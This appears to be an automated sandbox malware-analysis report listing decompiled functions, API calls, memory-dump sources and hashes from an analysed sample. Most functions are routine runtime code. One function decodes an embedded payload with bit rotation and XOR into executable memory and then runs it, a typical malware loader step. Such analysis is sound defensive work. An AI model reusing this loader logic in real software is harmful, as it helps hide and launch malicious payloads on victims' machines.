0x6d8684a7
0x6d8684a9
0x00000000
0x00000000
0x6d8684a9
0x00000000
0x6d8684ab
0x6d868484
0x6d86848a
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D868208,00000001,00000364,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008), ref: 6D8684B4

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 068df07bb216d2ad748ac9e1c8513cd8fc673a84b195bbc6d95edc2072ec5b8d
Instruction ID: 71f28ddd31260169993b7172591ba71f826d2e97bbb5f52a5dee57507f5f20a3
Opcode Fuzzy Hash: 068df07bb216d2ad748ac9e1c8513cd8fc673a84b195bbc6d95edc2072ec5b8d
Instruction Fuzzy Hash: D8F0B4312495A996EB129B268C0CF5B3B7CEB4B774B11C921B91C9A0C0CB20D80086F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8683F4, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8683F4(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6D866A5B(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6d8c1810, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6D86AD52();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6D866B7B(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6d8683fa
0x6d868400
0x6d868432
0x6d868437
0x6d86843d
0x00000000
0x6d86843d
0x6d868404
0x6d868406
0x6d868406
0x6d86841d
0x6d868426
0x6d86842e
0x00000000
0x00000000
0x6d86840e
0x6d868410
0x00000000
0x00000000
0x6d868419
0x6d86841b
0x00000000
0x00000000
0x6d86841b
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6D863211,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868426

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a743975301fba85f4a566dc94e37bf16c4c378f5dc075916cefec4dde97c7096
Instruction ID: 63330271c7c7f9205f6a1267c44348f97ae597bdc26dfed560eb7a9a06fa0ad9
Opcode Fuzzy Hash: a743975301fba85f4a566dc94e37bf16c4c378f5dc075916cefec4dde97c7096
Instruction Fuzzy Hash: BDE0A0212452F69BEB12176A8C0CF6B3A78EB4B3F1F528920BA6C920C0DB60C80085F0

Uniqueness

Uniqueness Score: -1.00%

Function 2FF11656, Relevance: 1.5, APIs: 1, Instructions: 22
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E2FF11656(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t12;
				void* _t19;

				_push(0x10);
				_push(0x2ff116a8);
				E2FF11310(__ebx, __edi, __esi);
				 *(_t19 - 0x1c) = 0;
				 *((intOrPtr*)(_t19 - 0x20)) = 0;
				if( *0x2ff13018 != 0) {
					L2:
					 *((intOrPtr*)(_t19 - 4)) = 0;
					_t10 = LoadLibraryW( *(_t19 + 8)); // executed
					 *(_t19 - 0x1c) = _t10;
					 *((intOrPtr*)(_t19 - 4)) = 0xfffffffe;
					E2FF11B39(0);
					_t12 =  *(_t19 - 0x1c);
				} else {
					_t12 = E2FF116C4(_t19 - 0x20); // executed
					if(_t12 != 0) {
						goto L2;
					}
				}
				return E2FF1153C(_t12);
			}

0x2ff11656
0x2ff11658
0x2ff1165d
0x2ff11664
0x2ff11667
0x2ff11670
0x2ff1167f
0x2ff1167f
0x2ff11685
0x2ff1168b
0x2ff1168e
0x2ff11695
0x2ff1169a
0x2ff11672
0x2ff11676
0x2ff1167d
0x00000000
0x00000000
0x2ff1167d
0x2ff116a2

APIs

LoadLibraryW.KERNELBASE(?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11685

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3b8f9751846349221493e3af1705fac9153b8c842d2197db002c8e93e689f4b2
Instruction ID: 39da79abfcb8bff35a0efe2a10718304cba5b823f4a6c2f0971f4b5fb6a7dff2
Opcode Fuzzy Hash: 3b8f9751846349221493e3af1705fac9153b8c842d2197db002c8e93e689f4b2
Instruction Fuzzy Hash: 46E0C970C00309ABEB14DFA6C9049DFBBBEBFA4350B1441269124A62A0D7799652DF61

Uniqueness

Uniqueness Score: -1.00%

Function 6D861030, Relevance: 1.4, APIs: 1, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D861030(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				void* __ebp;
				signed int _t30;
				void* _t32;
				void* _t46;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				void* _t61;
				void* _t68;
				void* _t74;
				void* _t75;
				signed int _t78;
				signed int _t79;

				_t30 =  *0x6d877014; // 0x6a907f72
				_v8 = _t30 ^ _t79;
				_t55 = __ecx;
				_t78 = __edx;
				_v24 = __ecx;
				_t32 = VirtualAlloc(0, 0x18bb, 0x1000, 0x40); // executed
				_v20 = _t32;
				_t84 = _t32;
				if(_t32 != 0) {
					E6D8659E0(_t32, 0x6d8bf690, 0x18bb);
					_push(_t78);
					_t74 = E6D8640A6(_t84);
					E6D8659E0(_t74, _t55, _t78);
					_t61 = _v20;
					_t56 = 0;
					do {
						_t68 = 0;
						if(_t78 > 0) {
							do {
								 *(_t68 + _t74) =  *(_t68 + _t74) >> 0x00000006 |  *(_t68 + _t74) << 0x00000002;
								_t68 = _t68 + 1;
							} while (_t68 < _t78);
							_t61 = _v20;
						}
						asm("cdq");
						 *(_t56 + _t61) =  *(_t56 + _t61) ^  *(_t56 % _t78 + _t74);
						_t56 = _t56 + 1;
						_t88 = _t56 - 0x18bb;
					} while (_t56 < 0x18bb);
					E6D8640AF(_t74);
					_push(_t78);
					_t75 = E6D8640A6(_t88);
					E6D8659E0(_t75, _v24, _t78);
					_t57 = 0;
					do {
						_t46 = 0;
						if(_t78 > 0) {
							do {
								 *(_t46 + _t75) =  *(_t46 + _t75) >> 0x00000006 |  *(_t46 + _t75) << 0x00000002;
								_t46 = _t46 + 1;
							} while (_t46 < _t78);
						}
						asm("cdq");
						 *(_t57 + 0x6d877890) =  *(_t57 + 0x6d877890) ^  *(_t57 % _t78 + _t75);
						_t57 = _t57 + 1;
					} while (_t57 < 0x47e00);
					E6D8640AF(_t75);
					_v16 = 0x6d877890;
					_v12 = 0x47e00;
					 *_v20( &_v16); // executed
				}
				return E6D864095(_v8 ^ _t79);
			}

0x6d861036
0x6d86103d
0x6d86104e
0x6d861050
0x6d861054
0x6d861057
0x6d86105d
0x6d861060
0x6d861062
0x6d861074
0x6d861079
0x6d861080
0x6d861084
0x6d861089
0x6d86108f
0x6d861091
0x6d861091
0x6d861095
0x6d861097
0x6d8610a4
0x6d8610a7
0x6d8610a8
0x6d8610ac
0x6d8610ac
0x6d8610b1
0x6d8610b7
0x6d8610ba
0x6d8610bb
0x6d8610bb
0x6d8610c4
0x6d8610c9
0x6d8610d3
0x6d8610d6
0x6d8610de
0x6d8610e0
0x6d8610e0
0x6d8610e4
0x6d8610e6
0x6d8610f3
0x6d8610f6
0x6d8610f7
0x6d8610e6
0x6d8610fd
0x6d861103
0x6d861109
0x6d86110a
0x6d861113
0x6d86111b
0x6d861126
0x6d86112d
0x6d861132
0x6d861142

APIs

VirtualAlloc.KERNELBASE(00000000,000018BB,00001000,00000040), ref: 6D861057

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1db0dbeec8e0624b104da16445f1d5dcd3e78b2655de7b970c10095f58112b0f
Instruction ID: 004c72a064f64868acb72eafc49fd0a16cf4232a7653270ba567851be10343e5
Opcode Fuzzy Hash: 1db0dbeec8e0624b104da16445f1d5dcd3e78b2655de7b970c10095f58112b0f
Instruction Fuzzy Hash: D3316B70A092E61BD7118A7D8C99BBF7B789F49364F1009A8E55097203CB708905C7B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 2FF11B2C, Relevance: 10.6, APIs: 7, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E2FF11B2C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t12;
				intOrPtr* _t29;
				void* _t32;

				_t32 = __ecx -  *0x2ff11b94; // 0x1d2dc1
				if(_t32 != 0) {
					 *0x2ff13198 = __eax;
					 *0x2ff13194 = __ecx;
					 *0x2ff13190 = __edx;
					 *0x2ff1318c = __ebx;
					 *0x2ff13188 = __esi;
					 *0x2ff13184 = __edi;
					 *0x2ff131b0 = ss;
					 *0x2ff131a4 = cs;
					 *0x2ff13180 = ds;
					 *0x2ff1317c = es;
					 *0x2ff13178 = fs;
					 *0x2ff13174 = gs;
					asm("pushfd");
					_pop( *0x2ff131a8);
					 *0x2ff1319c =  *_t29;
					 *0x2ff131a0 = _v0;
					 *0x2ff131ac =  &_a4;
					 *0x2ff130e8 = 0x10001;
					 *0x2ff1309c =  *0x2ff131a0;
					 *0x2ff13090 = 0xc0000409;
					 *0x2ff13094 = 1;
					_t12 =  *0x2ff11b94; // 0x1d2dc1
					_v812 = _t12;
					_v808 =  *0x2ff13004;
					 *0x2ff130e0 = IsDebuggerPresent();
					_push(1);
					L2FF12592();
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(0x2ff123b0);
					if( *0x2ff130e0 == 0) {
						_push(1);
						L2FF12592();
					}
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}

0x2ff11b2c
0x2ff11b32
0x2ff122b8
0x2ff122bd
0x2ff122c3
0x2ff122c9
0x2ff122cf
0x2ff122d5
0x2ff122db
0x2ff122e1
0x2ff122e7
0x2ff122ed
0x2ff122f3
0x2ff122f9
0x2ff122ff
0x2ff12300
0x2ff12309
0x2ff12311
0x2ff12319
0x2ff12324
0x2ff12333
0x2ff12338
0x2ff12342
0x2ff1234c
0x2ff12351
0x2ff1235c
0x2ff12368
0x2ff1236d
0x2ff1236f
0x2ff12377
0x2ff12382
0x2ff1238f
0x2ff12391
0x2ff12393
0x2ff12398
0x2ff123ac
0x2ff11b38
0x2ff11b38
0x2ff11b38

APIs

IsDebuggerPresent.KERNEL32 ref: 2FF12362
_crt_debugger_hook.MSVCR90(00000001), ref: 2FF1236F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 2FF12377
UnhandledExceptionFilter.KERNEL32(2FF123B0), ref: 2FF12382
_crt_debugger_hook.MSVCR90(00000001), ref: 2FF12393
GetCurrentProcess.KERNEL32(C0000409), ref: 2FF1239E
TerminateProcess.KERNEL32(00000000), ref: 2FF123A5

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: f22198ad4c3d728b376c15dc1a72431a1c35d8ab01c827efde54e459a6dd779f
Instruction ID: 7999284e4742ebd0e323095b86affa806e3b2ed5e67d9f81edbee1b0e7431d2c
Opcode Fuzzy Hash: f22198ad4c3d728b376c15dc1a72431a1c35d8ab01c827efde54e459a6dd779f
Instruction Fuzzy Hash: 5621B0B4D10244EFFB00DF67C1596467BF4BB08369F42405AE709A7365E77C95A08F25

Uniqueness

Uniqueness Score: -1.00%

Function 03031406, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(0000009C), ref: 03031454

Strings

ntdll.dll, xrefs: 03031500
RtlGetVersion, xrefs: 030314FB

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Version
String ID: RtlGetVersion$ntdll.dll
API String ID: 1889659487-1489217083
Opcode ID: 8a7a62dbc5b5569352d0e9418ebf9abc0b7d311e1e9d7cb11cd09f959c035911
Instruction ID: 7992a64888d7612eb2d4dfadc0f5d9d10c3cc8582c64b977298c5b30fa0b4ab6
Opcode Fuzzy Hash: 8a7a62dbc5b5569352d0e9418ebf9abc0b7d311e1e9d7cb11cd09f959c035911
Instruction Fuzzy Hash: 6E41D174F4A318EFDBA8EBB49CC4BADB6BCAF0B204F0804A9D507D5241C3749688CB11

Uniqueness

Uniqueness Score: -1.00%

Function 03062842, Relevance: 3.1, APIs: 2, Instructions: 79COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030628A5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03062919

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: df1d1e7b44ee605e1097fad69db6cab8c06083cbae53326b185f1a95aee6605d
Instruction ID: 2e8607f6398ffca43ce4a6662317712d7d01704f03f3e8123e93b721d72fca6e
Opcode Fuzzy Hash: df1d1e7b44ee605e1097fad69db6cab8c06083cbae53326b185f1a95aee6605d
Instruction Fuzzy Hash: 1021D275E01219AFEF01EBE4CD89AEEBBB9FB48300F108855F640A2250C7B5A9408F60

Uniqueness

Uniqueness Score: -1.00%

Function 2FF12024, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E2FF12024(short __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v88;
				short _v612;
				char _v1132;
				struct HINSTANCE__* _v1136;
				char _v1140;
				_Unknown_base(*)()* _v1144;
				_Unknown_base(*)()* _v1148;
				intOrPtr _v1152;
				void* __ebx;
				void* __ebp;
				signed int _t37;
				int _t42;
				void* _t43;
				struct HINSTANCE__* _t46;
				_Unknown_base(*)()* _t48;
				short _t55;
				void* _t58;
				struct HINSTANCE__* _t64;
				short _t65;
				short* _t66;
				short _t70;
				void* _t71;
				CHAR* _t72;
				void* _t73;
				CHAR* _t74;
				CHAR* _t76;
				signed int _t77;

				_t73 = __esi;
				_t71 = __edi;
				_t70 = __edx;
				_t37 =  *0x2ff11b94; // 0x1d2dc1
				_v8 = _t37 ^ _t77;
				_v1152 = _a4;
				_v1132 = 0;
				_t42 = GetSystemDirectoryW( &_v612, 0x105);
				_t65 = 0;
				if(_t42 != 0) {
					_t43 = _t42 + _t42;
					_t66 = _t77 + _t43 - 0x260;
					__eflags =  *_t66 - 0x5c;
					if(__eflags != 0) {
						_t70 = 0x5c;
						 *_t66 = _t70;
						__eflags = 0;
						 *((short*)(_t77 + _t43 - 0x25e)) = 0;
					}
					_t74 = L"msi.dll";
					__imp__wcsncat_s( &_v612, 0x106, _t74, 0xffffffff, _t73);
					_push(8);
					_push(_t65);
					_push( &_v612);
					_t46 = E2FF11F78(_t65, _t71, _t74, __eflags);
					_v1136 = _t46;
					__eflags = _t46 - _t65;
					if(__eflags != 0) {
						L6:
						_v1144 = GetProcAddress(_v1136, "MsiGetProductCodeW");
						_t48 = GetProcAddress(_v1136, "MsiProvideQualifiedComponentExW");
						_v1148 = _t48;
						__eflags = _t48 - _t65;
						if(_t48 != _t65) {
							_push(_t71);
							_t72 = L"wwlib.dll";
							_t76 = L"{1E77DE88-BCAB-4C37-B9E5-073AF52DFD7A}";
							__eflags = _v1152 - _t65;
							if(_v1152 == _t65) {
								L18:
								_v1140 = 0x104;
								__eflags = _v1148(_t76, _t72, _t65, _t65, _t65, _t65,  &_v1132,  &_v1140);
								if(__eflags == 0) {
									goto L20;
								}
								goto L19;
							} else {
								__eflags = _v1144 - _t65;
								if(_v1144 != _t65) {
									_t58 = _v1144(_v1152,  &_v88);
									__eflags = _t58 - _t65;
									if(_t58 != _t65) {
										L17:
										__eflags = _t58 - 0x642;
										if(__eflags == 0) {
											goto L20;
										} else {
											goto L18;
										}
									} else {
										_v1140 = 0x104;
										_t58 = _v1148(_t76, _t72, _t65,  &_v88, _t65, _t65,  &_v1132,  &_v1140);
										__eflags = _t58 - _t65;
										if(__eflags == 0) {
											L20:
											_push( &_v1132);
											_t65 = E2FF11656(_t65, _t72, _t76, __eflags);
										} else {
											goto L17;
										}
									}
									L19:
									FreeLibrary(_v1136);
									_t55 = _t65;
								} else {
									FreeLibrary(_v1136);
									_t55 = 0;
									__eflags = 0;
								}
							}
							_pop(_t71);
						} else {
							FreeLibrary(_v1136);
							goto L8;
						}
					} else {
						_push(_t74);
						_t64 = E2FF11656(_t65, _t71, _t74, __eflags);
						_v1136 = _t64;
						__eflags = _t64 - _t65;
						if(_t64 == _t65) {
							L8:
							_t55 = 0;
						} else {
							goto L6;
						}
					}
					_pop(_t73);
				} else {
					_t55 = 0;
				}
				return E2FF11B2C(_t55, _t65, _v8 ^ _t77, _t70, _t71, _t73);
			}

0x2ff12024
0x2ff12024
0x2ff12024
0x2ff1202d
0x2ff12034
0x2ff1203a
0x2ff12043
0x2ff12056
0x2ff1205c
0x2ff12060
0x2ff12069
0x2ff1206b
0x2ff12072
0x2ff12076
0x2ff1207a
0x2ff1207b
0x2ff1207e
0x2ff12080
0x2ff12080
0x2ff1208b
0x2ff1209d
0x2ff120a6
0x2ff120a8
0x2ff120af
0x2ff120b0
0x2ff120b5
0x2ff120bb
0x2ff120bd
0x2ff120cf
0x2ff120ed
0x2ff120f3
0x2ff120f5
0x2ff120fb
0x2ff120fd
0x2ff1210f
0x2ff12110
0x2ff12115
0x2ff1211a
0x2ff12120
0x2ff1218f
0x2ff121a3
0x2ff121b3
0x2ff121b5
0x00000000
0x00000000
0x00000000
0x2ff12122
0x2ff12122
0x2ff12128
0x2ff12153
0x2ff12159
0x2ff1215b
0x2ff12188
0x2ff12188
0x2ff1218d
0x00000000
0x00000000
0x00000000
0x00000000
0x2ff1215d
0x2ff12174
0x2ff1217e
0x2ff12184
0x2ff12186
0x2ff121ca
0x2ff121d0
0x2ff121d6
0x00000000
0x00000000
0x00000000
0x2ff12186
0x2ff121b7
0x2ff121bd
0x2ff121c3
0x2ff1212a
0x2ff12130
0x2ff12136
0x2ff12136
0x2ff12136
0x2ff12128
0x2ff12138
0x2ff120ff
0x2ff12105
0x00000000
0x2ff12105
0x2ff120bf
0x2ff120bf
0x2ff120c0
0x2ff120c5
0x2ff120cb
0x2ff120cd
0x2ff1210b
0x2ff1210b
0x00000000
0x00000000
0x00000000
0x2ff120cd
0x2ff12139
0x2ff12062
0x2ff12062
0x2ff12062
0x2ff12146

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 2FF12056
wcsncat_s.MSVCR90 ref: 2FF1209D
GetProcAddress.KERNEL32(?,MsiGetProductCodeW), ref: 2FF120E0
GetProcAddress.KERNEL32(?,MsiProvideQualifiedComponentExW), ref: 2FF120F3
FreeLibrary.KERNEL32(?), ref: 2FF12105
FreeLibrary.KERNEL32(?,?), ref: 2FF121BD

Strings

wwlib.dll, xrefs: 2FF12110, 2FF12172, 2FF121A1
msi.dll, xrefs: 2FF1208B, 2FF12090, 2FF120BF
MsiGetProductCodeW, xrefs: 2FF120D5
MsiProvideQualifiedComponentExW, xrefs: 2FF120E2
{1E77DE88-BCAB-4C37-B9E5-073AF52DFD7A}, xrefs: 2FF12115, 2FF12173, 2FF121A2

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeLibraryProc$DirectorySystemwcsncat_s
String ID: MsiGetProductCodeW$MsiProvideQualifiedComponentExW$msi.dll$wwlib.dll${1E77DE88-BCAB-4C37-B9E5-073AF52DFD7A}
API String ID: 179701683-1935280381
Opcode ID: 0c4fbfe69d451eccb03cae09a9acd10323ae056355e994c13bd9ff7cf582bcd8
Instruction ID: ea5d83d0b5e028df5fb29331bb68acede04df43b116cb17a3e418bed04694aa6
Opcode Fuzzy Hash: 0c4fbfe69d451eccb03cae09a9acd10323ae056355e994c13bd9ff7cf582bcd8
Instruction Fuzzy Hash: E7414EB1904118ABEB10DFB58CC4AEB77BEAF09344F1005AAE749E6150E7715E84CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0306BA0C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0306BA45
___free_lconv_mon.LIBCMT ref: 0306BA50

Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8BC
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8CE
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8E0
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D8F2
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D904
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D916
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D928
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D93A
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D94C
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D95E
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D970
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D982
Part of subcall function 0306D89F: _free.LIBCMT ref: 0306D994

_free.LIBCMT ref: 0306BA67
_free.LIBCMT ref: 0306BA7C
_free.LIBCMT ref: 0306BA87
_free.LIBCMT ref: 0306BAA9
_free.LIBCMT ref: 0306BABC
_free.LIBCMT ref: 0306BACA
_free.LIBCMT ref: 0306BAD5
_free.LIBCMT ref: 0306BB0D
_free.LIBCMT ref: 0306BB14
_free.LIBCMT ref: 0306BB31
_free.LIBCMT ref: 0306BB49

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: df6b1f7a2c8795fc4abc77b4cfee75946d9ac078e2db2fe9f4349ad85ee36e1d
Instruction ID: c3f1086b1679f945395731e8b6d6cc263d61a491abe74f23b8132e9a0966a5bf
Opcode Fuzzy Hash: df6b1f7a2c8795fc4abc77b4cfee75946d9ac078e2db2fe9f4349ad85ee36e1d
Instruction Fuzzy Hash: CA3182B1602300DFDB70EA7ADD44B96B7E8EF40260F189469E054DB198DFB1E880CB14

Uniqueness

Uniqueness Score: -1.00%

Function 03055026, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0305505F
___free_lconv_mon.LIBCMT ref: 0305506A

Part of subcall function 03055484: _free.LIBCMT ref: 030554A1
Part of subcall function 03055484: _free.LIBCMT ref: 030554B3
Part of subcall function 03055484: _free.LIBCMT ref: 030554C5
Part of subcall function 03055484: _free.LIBCMT ref: 030554D7
Part of subcall function 03055484: _free.LIBCMT ref: 030554E9
Part of subcall function 03055484: _free.LIBCMT ref: 030554FB
Part of subcall function 03055484: _free.LIBCMT ref: 0305550D
Part of subcall function 03055484: _free.LIBCMT ref: 0305551F
Part of subcall function 03055484: _free.LIBCMT ref: 03055531
Part of subcall function 03055484: _free.LIBCMT ref: 03055543
Part of subcall function 03055484: _free.LIBCMT ref: 03055555
Part of subcall function 03055484: _free.LIBCMT ref: 03055567
Part of subcall function 03055484: _free.LIBCMT ref: 03055579

_free.LIBCMT ref: 03055081
_free.LIBCMT ref: 03055096
_free.LIBCMT ref: 030550A1
_free.LIBCMT ref: 030550C3
_free.LIBCMT ref: 030550D6
_free.LIBCMT ref: 030550E4
_free.LIBCMT ref: 030550EF
_free.LIBCMT ref: 03055127
_free.LIBCMT ref: 0305512E
_free.LIBCMT ref: 0305514B
_free.LIBCMT ref: 03055163

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 73233df6c67ca89a909bb20c79b1644921c48474c2f88c8f075b560591f12c9e
Instruction ID: 2776af67420e57e3fcd481f576bed659a8d1f8a9965638b250c71cd51e2aefa5
Opcode Fuzzy Hash: 73233df6c67ca89a909bb20c79b1644921c48474c2f88c8f075b560591f12c9e
Instruction Fuzzy Hash: B8313B766023059FEB65EA79EC44B9BB7E8AF82210F184459F85BDB550DA31E880CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0303B7E7, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0303B82B

Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB21
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB33
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB45
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB57
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB69
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB7B
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB8D
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BB9F
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBB1
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBC3
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBD5
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBE7
Part of subcall function 0303BB04: _free.LIBCMT ref: 0303BBF9

_free.LIBCMT ref: 0303B820

Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67

_free.LIBCMT ref: 0303B842
_free.LIBCMT ref: 0303B857
_free.LIBCMT ref: 0303B862
_free.LIBCMT ref: 0303B884
_free.LIBCMT ref: 0303B897
_free.LIBCMT ref: 0303B8A5
